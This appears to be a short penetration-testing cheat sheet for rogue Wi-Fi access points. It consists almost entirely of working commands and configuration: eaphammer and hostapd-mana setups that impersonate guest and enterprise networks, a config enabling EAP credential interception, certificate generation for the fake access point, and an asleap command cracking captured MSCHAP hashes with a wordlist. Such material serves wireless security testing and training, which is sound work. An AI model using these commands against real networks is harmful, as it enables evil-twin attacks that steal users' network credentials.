Rogue APP

eaphammer

sudo ./eaphammer -e XX-Guest -c 6 --hw-mode g --auth wpa-psk --wpa-passphrase letmein12345 --wpa-version 2 -i wlan0

./eaphammer -i wlan0 --channel 6 --auth wpa-eap --essid SecureWireless

Hostapd

sudo apt install berate-ap  
sudo berate_ap wlan0 eth0 MyAccessPoint MyPassPhrase
openssl genrsa -out server.key 2048
sudo openssl req -new -sha256 -key server.key -out server.csr
openssl req -text -in server.csr -noout -verify
openssl req -x509 -sha256 -days 365 -key server.key -in server.csr -out server.pem
openssl dhparam 2048 > dhparam.pem 
ln -s server.pem ca.pem
nano hostapd.eap_user

* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP "1234test" [2]


host.cfg
interface=wlan0
ssid=XXX-GUEST
channel=6
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3

ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
eapol_key_index_workaround=0
ca_cert=/home/kali/ca.pem
server_cert=/home/kali/server.pem
private_key=/home/kali/server.key
private_key_passwd=
dh_file=/home/kali/dhparam.pem
mana_wpe=1 : enables WPE mode for EAP credentials interception
mana_eapsuccess=1 : enable EAP success messages
sudo hostapd-mana fakeap04022023.cfg

sudo ./asleap -C ae:f2:c2:f0:93:b1:79:37 -R 56:8d:f3:ca:77:6d:b4:5e:4a:7d:1e:0c:f6:2f:68:be:5e:27:e5:ad:f7:38:56:0f -W ~/rockyou.txt

Last updated